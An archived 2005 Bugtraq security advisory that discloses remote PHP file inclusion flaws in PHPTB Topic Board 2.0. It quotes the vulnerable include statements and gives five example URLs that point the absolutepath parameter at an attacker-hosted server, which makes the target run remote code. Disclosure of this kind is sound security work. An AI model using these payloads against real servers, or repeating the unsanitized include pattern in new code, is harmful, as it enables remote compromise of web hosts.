| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050817101439.3220.qmail@securityfocus.com>
Date: 17 Aug 2005 10:14:39 -0000
From: goszynskif@...il.com
To: bugtraq@...urityfocus.com
Subject: PHPTB Topic Board <= 20: Multiple PHP injection vulnerabilities
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: PHPTB Topic Board - Multiple PHP injection
vulnerabilities
Version <= 2.0
Homepage: htt://www.phptb.com/
Author: Filip Groszyński (VXSfx)
Date: 17 August 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Background:
PHPTB Topic Borad is an open source portal system.
However, an input validation flaw can cause malicious
attackers to remote code execution on the web server.
--------------------------------------------------------
Vulnerable code exist in ./classes/admin_o.php,
./classes/board_o.php,
./classes/dev_o.php,
./classes/file_o.php and
./classes/tech_o.php:
<?php
include $absolutepath.'classes/smart_o.php';
... EOF
Over that I found vulnerable code in ./classes/dev_o.php and
./classes/tech_o.php:
...
require $GLOBALS['absolutepath'].'userpass.php';
... EOF
--------------------------------------------------------
Examples:
http://[victim]/[dir]/classes/admin_o.php?absolutepath=http://[hacker_box]/
http://[victim]/[dir]/classes/board_o.php?absolutepath=http://[hacker_box]/
http://[victim]/[dir]/classes/dev_o.php?absolutepath=http://[hacker_box]/
http://[victim]/[dir]/classes/file_o.php?absolutepath=http://[hacker_box]/
http://[victim]/[dir]/classes/tech_o.php?absolutepath=http://[hacker_box]/
--------------------------------------------------------
Contact:
Author: Filip Groszynski (VXSfx)
Location: Poland <Warsaw>
Email: groszynskif gmail com
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Powered by blists - more mailing lists